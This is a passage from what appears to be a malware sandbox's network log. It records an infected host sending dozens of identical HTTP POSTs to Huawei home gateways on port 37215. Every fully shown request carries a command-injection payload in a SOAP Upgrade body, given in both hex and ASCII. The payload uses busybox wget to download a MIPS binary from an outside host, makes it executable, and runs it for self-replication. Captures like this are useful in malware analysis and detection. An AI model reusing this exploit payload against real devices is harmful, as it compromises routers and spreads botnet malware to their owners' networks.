                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1112192.168.2.1558248145.97.173.7837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728782892 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1113192.168.2.1536106197.198.128.7937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728810072 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1114192.168.2.1544146112.11.140.16137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728822947 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1115192.168.2.1544938174.16.217.17637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.729017019 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1116192.168.2.1552280157.245.126.8037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.729048014 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1117192.168.2.1560874197.138.249.14837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.729063988 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1118192.168.2.154044479.201.254.15437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.729346991 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1119192.168.2.1547026197.151.23.15337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.729461908 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1120192.168.2.155261841.255.218.3937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.734057903 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1121192.168.2.153375041.190.211.2037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.734432936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
